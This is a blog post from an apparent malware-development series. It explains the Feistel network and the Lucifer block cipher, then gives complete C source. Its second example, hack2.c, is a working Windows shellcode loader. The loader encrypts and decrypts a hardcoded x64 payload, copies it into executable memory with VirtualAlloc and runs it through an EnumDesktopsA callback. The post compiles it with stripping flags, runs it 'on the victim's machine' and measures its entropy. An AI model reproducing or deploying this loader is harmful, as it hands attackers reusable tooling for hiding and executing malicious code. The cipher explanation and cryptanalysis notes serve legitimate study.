Malware and cryptography 33: encrypt payload via Lucifer algorithm. Simple C example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on using Lucifer block cipher on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
Feistel networks
At the request of my readers, I would like to remind you what the Feistel network is. This is a very important concept that plays a vital role in modern cryptography and encryption systems.
The Feistel network is a block encryption technique created by Horst Feistel at IBM Labs in 1971.
The Feistel network is a block cipher structure that processes data by splitting each block into two equal parts: the left \( L \) and right \( R \) subblocks.
The left subblock is transformed using a function: \[ x = f(L,K) \] where \( K \) represents the key. This function can be any cryptographic operation, such as a shift cipher.
The transformed left subblock is then XORed with the unchanged right subblock: \( x = x \oplus R \).
After this, the left and right subblocks are swapped, and the process repeats for multiple rounds.
So the final output is the encrypted data.
Lucifer
Lucifer is one of the earliest block ciphers, created in the 1970s by Horst Feistel at IBM. It is a symmetric-key cipher that functions on 128-bit blocks and utilizes a Feistel network, which served as the basis for the more prominent Data Encryption Standard (DES)
.
In Lucifer encryption, the plaintext is bifurcated into two segments, with one segment undergoing transformation and the resultant output being XORed with the other segment. This procedure is reiterated across several iterations employing S-boxes, permutations, and key schedules to guarantee security.
Lucifer’s S-boxes accept 4-bit
inputs and produce 4-bit
outputs; the input for the S-boxes
is derived from the bit-permuted output of the S-boxes
from the preceding round, whereas the input for the S-boxes
in the initial round is the plaintext. A crucial bit is utilized to select the specific S-box
from two available options. Lucifer is depicted as a singular T-box
with 9
input bits and 8
output bits. In contrast to DES, there is no interchange between rounds, and no block halves are utilized. Lucifer employs 16
rounds, utilizes 128-bit
blocks, and features a key schedule that is less complex than that of DES
.
practical example 1
Let’s implement it in practice. First of all we need to define auxiliary functions, constants, and macros:
#define block_size 16 // 128 bit
#define key_size 16 // 128 bit
static const unsigned char s0[16] = {
0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};
static const unsigned char s1[16] = {
0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};
static const unsigned char m1[8] = {
0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};
static const unsigned char m2[8] = {
0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};
// macro to perform bitwise shifts
#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))
// extract high and low nibbles
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)
// swap function for char types
void swap(char* arg1, char* arg2) {
char tmp = *arg1;
*arg1 = *arg2;
*arg2 = tmp;
}
Then we need main encryption function.
Let me show a step-by-step explanation of our Lucifer encryption function.
The function takes a 128-bit
block (16 bytes
) and a key as inputs. The block is divided into two equal halves: the lower_half
(first 8 bytes) and the upper_half
(last 8 bytes):
char* lower_half = block;
char* upper_half = block + block_size / 2;
If decrypting, the initial key byte index is set to 8
, otherwise, it starts at 0
. A total of 16
rounds are performed during encryption or decryption:
int key_byte_idx = decrypt ? 8 : 0;
const int round_count = 16;
We start a loop for 16 rounds
of transformations. If decrypting, the key index is incremented by 1
after each round and looped back (using modulus) after reaching 16
:
for (int round = 0; round < round_count; ++round) {
if (decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
In each round, we process 8 steps
(one for each byte in the upper_half
). Here, message_byte
is the byte from upper_half
that we are processing in this step:
for (int step = 0; step < 8; ++step) {
char message_byte = upper_half[step];
This block applies the confusion step. Based on the key byte and step, we decide whether to use s0
or s1
substitution boxes to modify the message_byte
. This is similar to what happens in Feistel networks with S-boxes
:
if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
} else {
message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
}
Then the key interruption logic:
message_byte ^= key[key_byte_idx];
Here, the transformed byte is XOR
ed with the key byte. This introduces additional complexity to the encryption and ensures that each byte of the message is influenced by the key.
The next step is the permutation step where bits in message_byte
are shifted left or right based on predefined masks (m1
). This step scrambles the bits to further spread the influence of each bit across the whole byte:
message_byte = (shift_right(message_byte & m1[0], 3)) |
(shift_right(message_byte & m1[1], 4)) |
(shift_left(message_byte & m1[2], 2)) |
(shift_right(message_byte & m1[3], 1)) |
(shift_left(message_byte & m1[4], 2)) |
(shift_left(message_byte & m1[5], 4)) |
(shift_right(message_byte & m1[6], 1)) |
(shift_left(message_byte & m1[7], 1));
The resulting message_byte
is XOR
ed with various bits of lower_half
. This diffuses the changes across the lower_half
, ensuring that both halves of the block influence each other as the rounds progress:
lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
// repeat similar logic for other bits...
Then, we increment the key_byte_idx
to ensure that a different key byte is used for the next step. If we are not decrypting, this happens for all steps except the last one:
if (step < step_count - 1 || decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
At the end of each round, the lower_half
and upper_half
are swapped. This is a key part of the Feistel network design, ensuring that both halves of the block are processed in the next round:
for (int i = 0; i < block_size / 2; ++i) {
swap(&lower_half[i], &upper_half[i]);
}
After all rounds are completed, the halves are swapped again to finish the encryption process. This ensures the final encrypted block follows the Feistel design:
for (int i = 0; i < block_size / 2; ++i) {
swap(&block[i], &block[i + block_size / 2]);
}
Full source code of this function is looks like:
void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
char* lower_half = block;
char* upper_half = block + block_size / 2;
int key_byte_idx = decrypt ? 8 : 0;
const int round_count = 16;
for (int round = 0; round < round_count; ++round) {
if (decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
int transform_control_byte_idx = key_byte_idx;
const int step_count = 8;
for (int step = 0; step < step_count; ++step) {
char message_byte = upper_half[step];
// confusion
if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
} else {
message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
}
// key interruption
message_byte ^= key[key_byte_idx];
// permutation
message_byte = (shift_right(message_byte & m1[0], 3)) |
(shift_right(message_byte & m1[1], 4)) |
(shift_left(message_byte & m1[2], 2)) |
(shift_right(message_byte & m1[3], 1)) |
(shift_left(message_byte & m1[4], 2)) |
(shift_left(message_byte & m1[5], 4)) |
(shift_right(message_byte & m1[6], 1)) |
(shift_left(message_byte & m1[7], 1));
// diffusion
lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);
if (step < step_count - 1 || decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
}
// swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&lower_half[i], &upper_half[i]);
}
}
// physically swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&block[i], &block[i + block_size / 2]);
}
}
So, the function processes a 128-bit
block using 16
rounds of confusion, diffusion, and permutation.
Each round involves modifying bytes from the upper_half
and diffusing changes to the lower_half
.
The key is used to control S-box
substitution and XOR
operations at every step.
The halves of the block are swapped after every round, following the Feistel network design.
And finally, full source code of how we can encrypt plaintext block is looks like this (hack.c
):
/*
* hack.c
* Lucifer encryption example
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
*/
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#define block_size 16 // 128 bit
#define key_size 16 // 128 bit
static const unsigned char s0[16] = {
0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};
static const unsigned char s1[16] = {
0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};
static const unsigned char m1[8] = {
0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};
static const unsigned char m2[8] = {
0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};
// macro to perform bitwise shifts
#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))
// extract high and low nibbles
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)
// swap function for char types
void swap(char* arg1, char* arg2) {
char tmp = *arg1;
*arg1 = *arg2;
*arg2 = tmp;
}
void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
char* lower_half = block;
char* upper_half = block + block_size / 2;
int key_byte_idx = decrypt ? 8 : 0;
const int round_count = 16;
for (int round = 0; round < round_count; ++round) {
if (decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
int transform_control_byte_idx = key_byte_idx;
const int step_count = 8;
for (int step = 0; step < step_count; ++step) {
char message_byte = upper_half[step];
// confusion
if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
} else {
message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
}
// key interruption
message_byte ^= key[key_byte_idx];
// permutation
message_byte = (shift_right(message_byte & m1[0], 3)) |
(shift_right(message_byte & m1[1], 4)) |
(shift_left(message_byte & m1[2], 2)) |
(shift_right(message_byte & m1[3], 1)) |
(shift_left(message_byte & m1[4], 2)) |
(shift_left(message_byte & m1[5], 4)) |
(shift_right(message_byte & m1[6], 1)) |
(shift_left(message_byte & m1[7], 1));
// diffusion
lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);
if (step < step_count - 1 || decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
}
// swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&lower_half[i], &upper_half[i]);
}
}
// physically swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&block[i], &block[i + block_size / 2]);
}
}
int main() {
char message[block_size + 1] = "meowmeowmeowmeow"; // 16 characters + null terminator
char key[key_size] = "abcdefghijklmnop"; // example 128-bit key
message[block_size] = '\0'; // add a null terminator at the end of the message
printf("original block: %s\n", message);
Lucifer(message, key, false); // encrypt
printf("encrypted block: ");
for (int i = 0; i < block_size; i++) {
printf("%02x ", (unsigned char)message[i]);
}
printf("\n");
Lucifer(message, key, true); // decrypt
printf("decrypted block: %s\n", message);
return 0;
}
As you can, see in the main function I just encrypted meowmeowmeowmeow
message.
demo 1
Let’s see how this code works. Compile it for linux:
gcc hack.c -o hack
Then. run it:
./hack
As you can see, everything is worked perfectly in this case.
practical example 2
Let’s implement it with another logic: encrypt/decrypt payload and run it.
Source code for this is like in the first example, the only differences are two new functions:
// payload encryption function
void lucifer_encrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
for (int i = 0; i < payload_len / block_size; i++) {
Lucifer((char*)(payload + i * block_size), (char*)key, false);
}
}
// payload decryption function
void lucifer_decrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
for (int i = 0; i < payload_len / block_size; i++) {
Lucifer((char*)(payload + i * block_size), (char*)key, true);
}
}
This version of the code correctly implements the Lucifer cipher using the function from hack.c
, while applying the encryption and decryption process to payload blocks. The Lucifer
function is integrated within lucifer_encrypt_payload
and lucifer_decrypt_payload
, ensuring the correct encryption flow.
So the full source code is looks like this (hack2.c
):
/*
* hack.c
* Lucifer payload encryption/decryption
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
*/
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <windows.h>
#define block_size 16 // 128 bit
#define key_size 16 // 128 bit
static const unsigned char s0[16] = {
0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};
static const unsigned char s1[16] = {
0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};
static const unsigned char m1[8] = {
0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};
static const unsigned char m2[8] = {
0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};
#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)
void swap(char* arg1, char* arg2) {
char tmp = *arg1;
*arg1 = *arg2;
*arg2 = tmp;
}
void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
char* lower_half = block;
char* upper_half = block + block_size / 2;
int key_byte_idx = decrypt ? 8 : 0;
const int round_count = 16;
for (int round = 0; round < round_count; ++round) {
if (decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
int transform_control_byte_idx = key_byte_idx;
const int step_count = 8;
for (int step = 0; step < step_count; ++step) {
char message_byte = upper_half[step];
// confusion
if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
} else {
message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
}
// key interruption
message_byte ^= key[key_byte_idx];
// permutation
message_byte = (shift_right(message_byte & m1[0], 3)) |
(shift_right(message_byte & m1[1], 4)) |
(shift_left(message_byte & m1[2], 2)) |
(shift_right(message_byte & m1[3], 1)) |
(shift_left(message_byte & m1[4], 2)) |
(shift_left(message_byte & m1[5], 4)) |
(shift_right(message_byte & m1[6], 1)) |
(shift_left(message_byte & m1[7], 1));
// diffusion
lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);
if (step < step_count - 1 || decrypt) {
key_byte_idx = (key_byte_idx + 1) % round_count;
}
}
// swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&lower_half[i], &upper_half[i]);
}
}
// physically swap halves
for (int i = 0; i < block_size / 2; ++i) {
swap(&block[i], &block[i + block_size / 2]);
}
}
// payload encryption function
void lucifer_encrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
for (int i = 0; i < payload_len / block_size; i++) {
Lucifer((char*)(payload + i * block_size), (char*)key, false);
}
}
// payload decryption function
void lucifer_decrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
for (int i = 0; i < payload_len / block_size; i++) {
Lucifer((char*)(payload + i * block_size), (char*)key, true);
}
}
int main() {
unsigned char key[16] = "meowmeowbowwoow"; // example 128-bit key
unsigned char my_payload[] = {
0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
};
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (block_size - my_payload_len % block_size) % block_size;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len); // pad with NOPs (0x90)
memcpy(padded, my_payload, my_payload_len);
printf("original payload: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", my_payload[i]);
}
printf("\n\n");
// encrypt the payload
lucifer_encrypt_payload(padded, pad_len, key);
printf("encrypted payload: ");
for (int i = 0; i < pad_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
// decrypt the payload
lucifer_decrypt_payload(padded, pad_len, key);
printf("decrypted payload: ");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
As usually, I used meow-meow
messagebox payload here:
unsigned char my_payload[] = {
0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
};
Also, this code correctly maintaining the padding scheme and payload length.
demo 2
Let’s go to see everything in action. Compile it (in my linux
machine):
x86_64-w64-mingw32-gcc -O2 hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
Then, just run it in the victim’s machine (windows 11 x64
in my case):
.\hack2.exe
As you can see, everything is worked perfectly! =^..^=
Calculating Shannon entropy:
python3 entropy.py -f hack2.exe
Our payload in the .text
section.
As you know, many of the encryption algorithms I have looked at in my research and on this blog are used Feistel networks.
cryptoanalysis
Biham and Shamir (E. Biham and A. Shamir, “Differential Cryptanalysis of Snefru, Khafre, REDOC–II, LOKI, and Lucifer,” Advances in Cryptology—CRYPTO ’91 Proceedings, 1992, pp. 156–171 and E. Biham and A. Shamir, Differential Cryptanalysis of the Data Encryption Standard, Springer–Verlag, 1993) demonstrated that the initial version of Lucifer
, utilizing 32-bit
blocks and 8
rounds, is susceptible to differential cryptanalysis, requiring 40 chosen plaintexts and \( 2^{29} \) steps; similarly, the same attack can compromise Lucifer with 128-bit
blocks and 8
rounds, necessitating 60
chosen plaintexts and \( 2^{53} \) steps. A differential cryptanalytic attack successfully compromises 18-round
, 128-bit
Lucifer using 24
selected plaintexts in 221
steps.
I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
Malware and cryptography 1
source code in github
E. Biham and A. Shamir, “Differential Cryptanalysis of Snefru, Khafre, REDOC–II, LOKI, and Lucifer,” Advances in Cryptology—CRYPTO ’91 Proceedings, 1992, pp. 156–171
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine